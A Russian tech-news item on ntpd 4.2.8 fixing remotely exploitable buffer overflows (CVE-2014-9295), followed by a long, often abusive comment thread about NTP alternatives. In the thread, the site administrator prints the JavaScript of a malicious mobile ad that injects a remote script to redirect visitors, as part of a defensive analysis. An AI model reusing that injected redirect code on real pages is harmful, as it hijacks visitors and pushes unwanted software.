В демоне синхронизации точного времени ntpd 4.2.8 (http://support.ntp.org/bin/view/Main/SoftwareDownloads) устранены критические уязвимости (http://www.kb.cert.org/vuls/id/852879) (CVE-2014-9295 (https://access.redhat.com/security/cve/CVE-2014-9295)), вызванные ошибками, приводящими к переполнению буфера в коде функций crypto_recv() (http://support.ntp.org/bin/view/Main/SecurityNotice#Buffer_o...), ctl_putdata() (http://support.ntp.org/bin/view/Main/SecurityNotice#Buffer_o...) и configure() (http://support.ntp.org/bin/view/Main/SecurityNotice#Buffer_o...). Отправив специальным образом оформленный пакет, злоумышленник может инициировать отказ в обслуживании или организовать выполнение своего кода в системе с правами процесса ntpd, который обычно выполняется под пользователем ntp. Проблемы выявлены сотрудниками Google в процессе аудита кодовой базы ntpd.Уязвимость в crypto_recv() проявляется при включении в ntp.conf режима Autokey Authentication через директивы "crypto pw...". Для защиты следует отключить в конфигурации все директивы, начинающиеся со слова "crypto". При этом, так как аналогичные проблемы в ctl_putdata() и configure() проявляются при любой конфигурации, защититься от всех уязвимостей можно только обновив ntpd до версии 4.2.8 или установив патч.
В настоящее время обновлений пакетов с устранением проблемы не зафиксировано. Оценить появление обновлений в дистрибутивах можно на следующих страницах: openSUSE (http://lists.opensuse.org/opensuse-security-announce/), SLES (https://www.suse.com/support/update/), Slackware (http://www.slackware.com/security/list.php?l=slackware-secur...), Gentoo (http://www.gentoo.org/security/en/index.xml), CentOS (http://lists.centos.org/pipermail/centos-announce/2014-Decem...), RHEL 6 (https://rhn.redhat.com/errata/rhel-server-6-errata.html), RHEL 7 (https://rhn.redhat.com/errata/rhel-server-7-errata.html), Ubuntu (http://www.ubuntu.com/usn/), Debian (https://lists.debian.org/debian-security-announce/2014/), Fedora (https://admin.fedoraproject.org/updates/F21), FreeBSD (http://www.vuxml.org/freebsd/), NetBSD (http://www.netbsd.org/support/security/).
Дополнение: поступили сведения о появлении в открытом доступа эксплоита. Рекомендуется срочно обновить ntpd.
URL: http://www.kb.cert.org/vuls/id/852879
Новость: http://www.opennet.me/opennews/art.shtml?num=41309
Зачем оно надо когда есть cron + ntpdate ?
В качестве сервера?А для случаев, когда сдвиг времени из-за ntpdate недопустим, и нужно плавно модифицировать время, как это делает обычный ntpd?
> В качестве сервера?
> А для случаев, когда сдвиг времени из-за ntpdate недопустим, и нужно плавно
> модифицировать время, как это делает обычный ntpd?в качестве сервера таду уж ставь атомные часы и синхронизируйся по гпс
Угу. А вместо UPSа используйте собственную электростанцию.
> Угу. А вместо UPSа используйте собственную электростанцию.А ведь UPS и нужен только для того, чтобы держать пока резервный генератор заводится с пол-оборота.
> резервный генераторкоторый питается от собственного НПЗ, которой перерабатывает нефть из собственной буровой. Т.е. собственная буровая под окном -- всенепременное условие отказоустойчивой работы сервиса.
Судя по тому, как вы ерничаете, вы, видимо, никогда не были в датацентрах. Нормальный датацентр действительно имеет собственную генераторную.
> Судя по тому, как вы ерничаете, вы, видимо, никогда не были в
> датацентрах. Нормальный датацентр действительно имеет собственную генераторную.А вы, видимо, никогда не ловили внезапное выключение питания в ДЦ)
>> резервный генератор
> который питается от собственного НПЗ, которой перерабатывает нефть из собственной буровой.
> Т.е. собственная буровая под окном -- всенепременное условие отказоустойчивой работы сервиса.Нихрена вы тут условий наворотили...
А всего-то хотелось свой сайт с фоточками поднять.
>>> резервный генератор
>> который питается от собственного НПЗ, которой перерабатывает нефть из собственной буровой.
>> Т.е. собственная буровая под окном -- всенепременное условие отказоустойчивой работы сервиса.
> Нихрена вы тут условий наворотили...
> А всего-то хотелось свой сайт с фоточками поднять.домашний сервачек для файлопомойки)
> домашний сервачек для файлопомойки)Взять платку на ARM, она от упс проработает почти как от электростанции :)
аааааа браток кажись Tier-1 в глаза не видел )))
> аааааа браток кажись Tier-1 в глаза не видел )))Как бы это сказать... Тамбовский волк тебе браток. Со своими блатными замашками, иди лучше в падик пивка попей.
>> аааааа браток кажись Tier-1 в глаза не видел )))
> Как бы это сказать... Тамбовский волк тебе браток. Со своими блатными замашками,
> иди лучше в падик пивка попей.жую попкорн, а ты слюни подотри
>>> аааааа браток кажись Tier-1 в глаза не видел )))
>> Как бы это сказать... Тамбовский волк тебе браток. Со своими блатными замашками,
>> иди лучше в падик пивка попей.
> жую попкорн, а ты слюни подотриЕсли ты не справляешься со своими слюнями, то просто носи слюнявчик. Если не знаешь как его одеть, попроси маму. Ко мне же со столь интимными вопросами не стоит обращаться.
> Угу. А вместо UPSа используйте собственную электростанцию.я посмотрю как вы ntp сервак поднимать в закрытой сети, где нет доступа к источникам точного времени
>> Угу. А вместо UPSа используйте собственную электростанцию.
> я посмотрю как вы ntp сервак поднимать в закрытой сети, где нет
> доступа к источникам точного времениДитятко, это довольно убогой демагогический приём: выбрать среди тысячи use-case'ов один, самый неприглядный для ntp, и после этого заявлять что ntp не нужен. Ты вообще математику посещаешь в школе или прогуливаешь напропалую? И если не прогуливаешь, то в каком же классе ты, что не въезжаешь во всю глубину тупости своего аргумента?
Ну а теперь подумай, нах..я в изолированной сети точное время? Хватит времени сервера.
Часы есть на каждой маме, при правильном тюнинге (ajtimexconfig) за год уползают на минуту.
> Я посмотрю, как ты SSL заставишь работать с такими часами.Есть такая штука как tlsdate. Да, TLS умеет настолько дофига всего что до кучи через него еще и "сколько время?!" спросить можно.
>> Я посмотрю, как ты SSL заставишь работать с такими часами.
> Есть такая штука как tlsdate. Да, TLS умеет настолько дофига всего что
> до кучи через него еще и "сколько время?!" спросить можно.Это вы еще про htpdate не слышали.
павлин запел ну наконецто
> доступа к источникам точного времениА GPS и глонасс вас тоже забанили? В этих системах очень точное время. Свет штука быстрая и при плохой синхронизации времени система бы сильно врала в координатах.
На случае подляны - поставьте несколько приемников разных систем. И глонасс и гпс, а в перспективе и всякие европейские галилео и китайские байды - чем больше систем поддерживается тем менее вероятно что их все отключат или заглушат. Ну если уж надо - значит надо. Для пущей надежности можно алертить админа при разбеге на интервал более чем икс.
>> доступа к источникам точного времени
> А GPS и глонасс вас тоже забанили? В этих системах очень точное
> время. Свет штука быстрая и при плохой синхронизации времени система бы
> сильно врала в координатах.
> На случае подляны - поставьте несколько приемников разных систем. И глонасс и
> гпс, а в перспективе и всякие европейские галилео и китайские байды
> - чем больше систем поддерживается тем менее вероятно что их все
> отключат или заглушат. Ну если уж надо - значит надо. Для
> пущей надежности можно алертить админа при разбеге на интервал более чем
> икс.когда начнётся, работать не будет ни одна из них, правда тогда на синхронизацию времени на серверах а тем более клиентах , боюсь будет все глубоко посрать. спасибо за ваше ценное мнение, мы обязательно делаем оргвыводы.
> когда начнётся, работать не будет ни одна из них,Вот это не факт - системы рулятся совсем разными юрисдикциями и у них разные параметры. Чем больше систем - тем менее вероятно что завалятся все сразу. Обычная теория надежности.
Хотя если имелось в виду что начнется глобальная ядерная война - ну так и быть, я переживу в этих условиях и без идеально точного времени.
> Хотя если имелось в видунепереживёшь и не надейся
>> доступа к источникам точного времени
> А GPS и глонасс вас тоже забанили? В этих системах очень точное
> время. Свет штука быстрая и при плохой синхронизации времени система бы
> сильно врала в координатах.
> На случае подляны - поставьте несколько приемников разных систем. И глонасс и
> гпс, а в перспективе и всякие европейские галилео и китайские байды
> - чем больше систем поддерживается тем менее вероятно что их все
> отключат или заглушат. Ну если уж надо - значит надо. Для
> пущей надежности можно алертить админа при разбеге на интервал более чем
> икс.прочтите все мои коменты
>> В качестве сервера?
>> А для случаев, когда сдвиг времени из-за ntpdate недопустим, и нужно плавно
>> модифицировать время, как это делает обычный ntpd?
> в качестве сервера таду уж ставь атомные часы и синхронизируйся по гпсЕсли есть "атомные часы", нафига синхронизироваться по GPS?
Развелось школия.
Вы, прежде чем чушь нести, поинтересовались бы стабильностью рубидия и требованиям к, скажем, PMU (http://en.wikipedia.org/wiki/Phasor_measurement_unit). Поясняю - разойдётся за месяц.
> синхронизируйся по гпсА потом США решат срубить немного лулзов и отправят неправильное время :).
> А потом США решат срубить немного лулзов и отправят неправильное время :).Задолбаются своих предупреждать, чтоб не велись.
> Задолбаются своих предупреждать, чтоб не велись.Так спутники над поверхностью планеты не стационарно висят - лулзы можно слать лишь при пролете над "дружественной" территорией. Коненчо врядли удастся обеспечить филигранную точность, но в целом некий простор для креативной правки параметров имеется.
Вообще-то как раз стационарно. На геоцентрической орбите. Учите матчасть.
Таки не на геостационарной
http://upload.wikimedia.org/wikipedia/commons/9/9c/Constella...
Вы определитесь, вам нужно точное время или приблизительное?
The default polling value after restart of NTP is the value specified by minpoll. The default values for minpoll and maxpoll are 6 (64 seconds) and 10 (1024 seconds) respectively.чем крон не ахти ?
и нет понятия приблизительное, даже синхронизация по крону это уже точное время
Администратору локалхоста хватит и ntpdate -b pool.ntp.orgА если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок, без ntpd не обойтись.
И да, у нас stratum 1 с GPS
> Администратору локалхоста хватит и ntpdate -b pool.ntp.org
> А если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок,
> без ntpd не обойтись.
> И да, у нас stratum 1 с GPSподнять ntpd на 3000+ серверах или прописать на 3000+ строчек в крон на каждой машине - не одно и тоже ?
пс: паппет в помощь, базар ни о чём
>> Администратору локалхоста хватит и ntpdate -b pool.ntp.org
>> А если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок,
>> без ntpd не обойтись.
>> И да, у нас stratum 1 с GPS
> поднять ntpd на 3000+ серверах или прописать на 3000+ строчек в крон
> на каждой машине - не одно и тоже ?
> пс: паппет в помощь, базар ни о чёмДетский сад, чесслово. Какой нах... паппет, лохи. Видюзятнегов наползло.
На маршрутизаторе перехватаваете пакеты, маскарад, и направляете на свой сервак.
Все венды думают, что им время дал time-windows.com.
> Видюзятнегов наползло....
> Все венды думают, что им время дал time-windows.com.Павлин сам себя обоcpaл? :)
>> Видюзятнегов наползло.
> ...
>> Все венды думают, что им время дал time-windows.com.
> Павлин сам себя обоcpaл? :)просто показал что он менее тупой чем ты, например.
>>> Администратору локалхоста хватит и ntpdate -b pool.ntp.org
>>> А если нужно отдавать время 3000+ рабочих станций, серверов и прочих цисок,
>>> без ntpd не обойтись.
>>> И да, у нас stratum 1 с GPS
>> поднять ntpd на 3000+ серверах или прописать на 3000+ строчек в крон
>> на каждой машине - не одно и тоже ?
>> пс: паппет в помощь, базар ни о чём
> Детский сад, чесслово. Какой нах... паппет, лохи. Видюзятнегов наползло.
> На маршрутизаторе перехватаваете пакеты, маскарад, и направляете на свой сервак.
> Все венды думают, что им время дал time-windows.com.мелкософт заказал пиар
> без ntpd не обойтись.
> И да, у нас stratum 1 с GPSЕсли уж на то пошло, есть openntpd. И клиент и сервер в мизерных размерах. И одна из полутора утилит из опенка которая оказалась мне полезной.
> Если уж на то пошло, есть openntpd. И клиент и сервер в
> мизерных размерах. И одна из полутора утилит из опенка которая оказалась
> мне полезной.Вне опенка она уже давно заброшена.
>> Если уж на то пошло, есть openntpd. И клиент и сервер в
>> мизерных размерах. И одна из полутора утилит из опенка которая оказалась
>> мне полезной.
> Вне опенка она уже давно заброшен+1
ставить openbsd ради ntpserver это маразм)
> ставить openbsd ради ntpserver это маразм)Да вообще-то этот демон весом в ...цать кило чудно работает на пингвине. Я что, сильно похож на поклонника садомазо - с опенбздой сношаться? Он есть в репках например той же убунты, да и в дебиане не сильно древнем должен быть. Хотя программу такого размера можно и из сорцов собрать накрайняк - там зависимостей полторы штуки.
> Да вообще-то этот демон весом в ...цать кило чудно работает на пингвине.То, что работает на пингвине, имеет мало общего с openntpd из openbsd. Все-таки, за шесть лет многое поменялось.
> Зачем оно надо когда есть cron + ntpdate ?Затем. Например для билинга. Чтобы не было скачков в выставляемых счетах и не орали "<оператор> ворует бабло!!!"
> Зачем оно надо когда есть cron + ntpdate ?1. ntpdate is deprecated
2. ntpdate - это фактически ntpd (с очень небольшими изменениями), так что наверняка наследует его уязвимости.
>> Зачем оно надо когда есть cron + ntpdate ?
> 1. ntpdate is deprecated
> 2. ntpdate - это фактически ntpd (с очень небольшими изменениями), так что
> наверняка наследует его уязвимости.ну и спрашивается зачем нужна уязвимая хрень которая висит в системе как демон и жрёт ресурсы ?
можно и по крону дёргать, чё такие все принципиальные ?на одном вшивом сервере вариант с кроном самый раз
> на одном вшивом сервере вариант с кроном самый разСкорее уж с openntpd. Который мизерный по размеру и потому кучи дыр в нем не ожидается.
> Скорее уж с openntpd. Который мизерный по размеру и потому кучи дыр в нем не ожидается.Не очень доверяю коду, который уже шесть лет валяется забытым в сторонке (это я про "экспортную" версию openntpd). Даже если кода там 1800 строк (а это уже отнюдь не приветмир).
> (это я про "экспортную" версию openntpd). Даже если кода там 1800
> строк (а это уже отнюдь не приветмир).Но и не такой переросток как сабж, где кода в разы больше. А как известно, больше кода - больше багов.
> Но и не такой переросток как сабж, где кода в разы больше.
> А как известно, больше кода - больше багов.Сабж хотя бы поддерживают, и устраняют дыры. А к портируемой версии openntpd уже шесть лет никто не прикасался.
> ну и спрашивается зачем нужна уязвимая хрень которая висит в системе как демон и жрёт ресурсы ?
> можно и по крону дёргать, чё такие все принципиальные ?Особенно забавляет ваша апелляция к "уязвимости". Вы таки думаете, что клиент, запущеный по крону и подключающийся к заведомо уязвимому (и, возможно, уже скомпрометированному) серверу позволит гарантированно обеспечить безопасность?
> Зачем оно надо когда есть cron + ntpdate ?Действительно, зачем нужен карьерный самосвал? Можно возить руду мешками, в багажнике малолитражки.
руки поотрывать
Сколько лет ставлю везде OpenNTPd, и горя не знаю... Может, он не настолько клюквенно-развесистый, но задачи "синхронизировать время вот с этими серверами" и "дать синхронизироваться другим" выполняет без проблем, что в локалке, что в большой Сети.
> Сколько лет ставлю везде OpenNTPd, и горя не знаю... Может, он не
> настолько клюквенно-развесистый, но задачи "синхронизировать время вот с этими серверами"
> и "дать синхронизироваться другим" выполняет без проблем, что в локалке, что
> в большой Сети.На официальном сайте проекта написано, что portable-версия (т.е. версия для ОС, отличных от OpenBSD), устарела и не поддерживается.
Похоже, разработчики опенка придерживаются того же подхода, что и Поттеринг - "будем пилить под свою любимую ось, а проблемы негров шерифа не интересуют".
> устарела и не поддерживается....но работает и каши не просит. И дыр в проге на ..цать кило как-то менее ожидаемо чем в переростке где кода суммарно чуть ли не мег.
> Похоже, разработчики опенка придерживаются того же подхода,
Да разработчики на самом деле все такие, только не все себе в этом честно признаются :)
> ...но работает и каши не просит. И дыр в проге на ..цать
> кило как-то менее ожидаемо чем в переростке где кода суммарно чуть
> ли не мег.Размер кода отличатся всего лишь в три раза.
А вот уровень поддержки - радикально.С тем же успехом можно сказать, что и не обновленный ntpd "каши не просит". Ну правда, зачем его обновлять?
Там ограниченное число используемых ip-ков, посему всегда использовал файер
> поступили сведения о появлении в открытом доступе эксплоитаЭталонный экземпляр эксплойта хранится на Stratum-0 NTP-сервере ВНИИФТРИ.
> Эталонный экземпляр эксплойта хранится на Stratum-0 NTP-сервере ВНИИФТРИ.А я то думал что на сервере парижской палаты мер и весов...
Простите за оффтоп. Но напишу: люблю я почитать ваш сайт, чаще всего я делаю это с смартфона. Ну вот, решил я сегодня почитать новости, меня перекидывает на рекламу UC Browser, с текстом типа "Для просмотра этого сайта установите UC Browser". У меня у одного такая чертовщина?
> Простите за оффтоп. Но напишу: люблю я почитать ваш сайт, чаще всего
> я делаю это с смартфона. Ну вот, решил я сегодня почитать
> новости, меня перекидывает на рекламу UC Browser, с текстом типа "Для
> просмотра этого сайта установите UC Browser". У меня у одного такая
> чертовщина?эт ваш провайдер )
пс: давно опеннету перейти на ссл
зачем opennet переходить на SSL?
> зачем opennet переходить на SSL?чтоб вам хню всякого рода по дороге до вашего браузера не пихал
> чтоб вам хню всякого рода по дороге до вашего браузера не пихалМожет у него винда и он просто вирусов нацеплял? Там такого добра - хоть отбавляй.
> Простите за оффтоп. Но напишу: люблю я почитать ваш сайт, чаще всего
> я делаю это с смартфона. Ну вот, решил я сегодня почитать
> новости, меня перекидывает на рекламу UC Browser, с текстом типа "Для
> просмотра этого сайта установите UC Browser".На opennet.ru не практикуется размещение всплывающей рекламы и автоматический переброс куда-то. На http://m.opennet.ru вообще никакой рекламы быть не должно.
Наиболее вероятно у вас в смартфоне завелось вредоносное ПО. Попробуйте проверить систему антивирусом. Другое предположение, что вы пользуйтесь беспроводной сетью, подставляющей в трафик свою рекламу. Сообщения об автоматическом открытии рекламных ссылок ко мне периодически поступают, но все они сводились к этим двум причинам.
Напишите, на базе какой ОС у вас смартфон, какой браузер, через какого провайдера выходите в сеть, наблюдается ли подобное для других сайтов, открывайте мобильную или обычную редакцией сайта, на какую страницу перекидывает?
Максим, а у меня другой вопрос. Можно ли перевести опеннет на утф-8? Кажется, время кои8р уже давно прошло.
Нереально, слишком много возни с перекодировкой и много чего переделывать придётся.
Причина оказалась в Google AdSense. Там кто-то разместил html5-баннер, который показыется только для мобильных браузеров и меняет location.href и перебрасывает на левую страницу. Не ожидал такого недосмотра от Google. До разбирательства отключил код AdSense с сайта. Жалобу в Google отправил, но когда у них руки дойдут непонятно.
Поймать этот вредоносный баннер можно на http://www.opennet.me/test/1.html Если почистить Cookie и поставить в User Agent идентификатор Chrome для Android (например, в Firefox это можно сделать через дополнение User Agent Overrider), то через несколько перезагрузок страницы тот баннер ловится.Переброс осуществляется на http://www.opennet.me.tinymp.com/uc.php (на других сайтах вместо "www.opennet.ru" после ".tinymp.com" прописывается текущий домен)
затем на
http://click.union.ucweb.com/index.php?service=RedirectServi...http://hwoxt.com/?a=510746&c=1281273&m=24&s1=test20
Свойственные для проблемного баннера обращения к AdSense:http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-...
http://adx.stcounter.com/adx.js?kcid=51435b3f35749150bf00080...
http://googleads.g.doubleclick.net/pagead/adview?ai=CzVkCEN-...
Проблемный код, который вызывает переход:try{function callKonvertaZP(src) {if (typeof(src) == 'undefined') return; var d = document, b=d.body; if(src.toUpperCase().indexOf('HTTP://')==0||src.toUpperCase().indexOf('HTTPS://')==0) try{var img = d.createElement('IMG'); var s = src.replace(/%random%/, Math.round(Math.random()*9999999)); with(img.style){position = 'absolute'; width = '0px'; height = '0px';} img.src = s; b.insertBefore(img, b.firstChild);}catch(e){}}
var konverta_ad_href = '';
try{konverta_ad_href=(window.top || window.self).location.href;konverta_ad_href=encodeURIComponent(konverta_ad_href);}catch(e){}
function trackKonvertaClick() {callKonvertaZP('http://adclick.g.doubleclick.net/aclk?sa=l&ai=Coo2lEN-VVPj3C...');}(function() {
var wc = document.createElement('script'); wc.type = 'text/javascript'; wc.async = true;
wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozi...';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
})();callKonvertaZP('http://pix.stcounter.com/adx.gif?bid=514b006435749149c200000...');}catch(e){}
В частности, кусокwc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozi...';
приводит к получению строки
setTimeout("window.top.location.href='http://www.opennet.me.tinymp.com/uc.php?random=1ee46b4c2993b...';", 100);
которая затем выполняется кодом:
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
Полный архив со слепком проблемных скриптов http://www.opennet.me/test/1.tgz (проблемный код в 1_files/ads_data/adx.js)
Вот теперь все нормально, спасибо!
> Отправив специальным образом оформленный пакетУточните, куда отправить. И кто примет. У меня компьютер не имеет открытых портов и слушателей на них. Поэтому вопрос, как?
Отправлять нужно по почте заказным письмом
Куда - не принципиально, главное, чтобы там было психиатрическое отделение
Уважаемый автор, спасибо за содержательное дополнение к Вашей статье.
Юзайте openntpd от Тео.
Очень актуально для Раши, когда часовые пояса меняются как бог на душу положит. Посему рекомендация - отключить синхронизацию совсем.
> Очень актуально для Раши, когда часовые пояса меняются как бог на душу
> положит. Посему рекомендация - отключить синхронизацию совсем.ntp не связан часовыми поясами.
>> Очень актуально для Раши, когда часовые пояса меняются как бог на душу
>> положит. Посему рекомендация - отключить синхронизацию совсем.
> ntp не связан часовыми поясами.Для доморощенных политолухов технические подробности не важны. Им главное про рашку поудачнее ввернуть.
> Юзайте openntpd от Тео.openntpd на линуксе по сути не поддерживается и имеет худшую точность, по сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.
>> Юзайте openntpd от Тео.
> openntpd на линуксе по сути не поддерживается и имеет худшую точность, по
> сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.lsb_release -ir
Distributor ID: Debian
Release: 7.7
apt-cache search openntpd
openntpd - OpenBSD NTP daemon
Иногда лучше жевать, чем говорить.OpenNTPD is primarily developed by Henning Brauer as part of the OpenBSD Project and gets released as part of it every six months. ***The portable version is outdated and in need of a maintainer.***
> ***The portable version is outdated and in need of a maintainer.***Если быть точным, последняя версия openntpd "для унтерменшей" датируется апрелем 2008 года.
Хотя сам по себе проект вполне жив - например, Revision 1.55, Thu Nov 20 05:51:20 2014 UTC (4 weeks, 2 days ago) by jsg. Просто он релизится строго в составе OpenBSD base system.
>> ***The portable version is outdated and in need of a maintainer.***
> Если быть точным, последняя версия openntpd "для унтерменшей" датируется апрелем 2008 года.
> Хотя сам по себе проект вполне жив - например, Revision 1.55, Thu
> Nov 20 05:51:20 2014 UTC (4 weeks, 2 days ago) by
> jsg. Просто он релизится строго в составе OpenBSD base system.поздравляю, в Debian'е своих сопровождающих есть
mkdir -p /tmp/asd
cd /tmp/asdapt-get source openntpd
Reading package lists... Done
Building dependency tree
Reading state information... Done
NOTICE: 'openntpd' packaging is maintained in the 'Git' version control system at:
git://git.debian.org/collab-maint/openntpd.git/
Need to get 191 kB of source archives.
Get:1 http://ftp.debian.org/debian/ wheezy-backports/main openntpd 20080406p-7~bpo70+1 (dsc) [1 928 B]
Get:2 http://ftp.debian.org/debian/ wheezy-backports/main openntpd 20080406p-7~bpo70+1 (tar) [176 kB]
Get:3 http://ftp.debian.org/debian/ wheezy-backports/main openntpd 20080406p-7~bpo70+1 (diff) [13,6 kB]
Fetched 191 kB in 1s (113 kB/s)
dpkg-source: info: extracting openntpd in openntpd-20080406p
dpkg-source: info: unpacking openntpd_20080406p.orig.tar.gz
dpkg-source: info: unpacking openntpd_20080406p-7~bpo70+1.debian.tar.gz
dpkg-source: info: applying 01-use-debian-ntp-pool.patch
dpkg-source: info: applying 02-warn-unsupp-servers.patch
dpkg-source: info: applying 03-manpage-no-server-by-default.patch
dpkg-source: info: applying 04-syslog.patch
dpkg-source: info: applying 05-fix-kfreebsd-ftbfs.patch
dpkg-source: info: applying 06-pid.patch
dpkg-source: info: applying 07-dnstimeout.patch
cd openntpd-20080406p/debian/patches/
ls -la
total 40
drwxr-xr-x 2 user user 4096 Дек 24 2013 .
drwxr-xr-x 5 user user 4096 Апр 17 2014 ..
-rw-r--r-- 1 user user 560 Дек 24 2013 01-use-debian-ntp-pool.patch
-rw-r--r-- 1 user user 999 Дек 24 2013 02-warn-unsupp-servers.patch
-rw-r--r-- 1 user user 826 Дек 24 2013 03-manpage-no-server-by-default.patch
-rw-r--r-- 1 user user 1040 Дек 24 2013 04-syslog.patch
-rw-r--r-- 1 user user 630 Дек 24 2013 05-fix-kfreebsd-ftbfs.patch
-rw-r--r-- 1 user user 3581 Дек 24 2013 06-pid.patch
-rw-r--r-- 1 user user 1273 Дек 24 2013 07-dnstimeout.patch
-rw-r--r-- 1 user user 173 Дек 24 2013 series
>> ***The portable version is outdated and in need of a maintainer.***
> Если быть точным, последняя версия openntpd "для унтерменшей" датируется апрелем 2008 года.вот про это я и говорю. аптгетчикам уже мало исходников, им надо, чтобы кто-то им готовые пакеты выкатывал. опенсорс нужен как повод визжать по форумам.
> вот про это я и говорю. аптгетчикам уже мало исходников, им надо,
> чтобы кто-то им готовые пакеты выкатывал. опенсорс нужен как повод визжать
> по форумам.завидовать нужно молча
> завидовать нужно молчасогласен. непонятно, почему тогда ты рот раскрыл.
>> завидовать нужно молча
> согласен. непонятно, почему тогда ты рот раскрыл.поздравляю -- тест пройден и ты продолжаешь гавкать, значит и на apt-get и на aptitude реакция у тебя одинакова. осталось выяснить причины столь странного поведения, и я хоть не большой специалист в области переферийной нервной деятельности псовых, но могу заметить что данное поведение нетипично и подлежит пристальному глубокому изучению.
Два имбeцила встретились. Алилуйя.
> Два имбeцила встретились. Алилуйя.дык не два, бери выше и не отказывате нам в вашем обществе.
Не в обиду вам, два alicebot'а намного более интеллектуальные беседы ведут.
> Не в обиду вам, два alicebot'а намного более интеллектуальные беседы ведут.что-вы, ниразу, вот ты поди сейчас тоже считаешь что "беседует" с тобой человек, а вот почему ты так решил? тото-же!
> openntpd на линуксе по сути не поддерживается и имеет худшую точность, по
> сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.Но с другой стороны его точности зачастую достаточно, он делает свое дело и весит хренадцать кило.
>> openntpd на линуксе по сути не поддерживается и имеет худшую точность, по
>> сравнению с isc ntpd. Подробности есть в гугле, извините, искать лень.
> Но с другой стороны его точности зачастую достаточно, он делает свое дело
> и весит хренадцать кило.Стесняюсь спросить, сколько дыр может быть в не поддерживаемом коде с шестилетней коркой плесени.
И таки вроде бы простые программы содержат уязвимости. kiss уже совсем не рулит?
а ежели нету в конфиге включенной криптографии?
> а ежели нету в конфиге включенной криптографии?Тады ой.
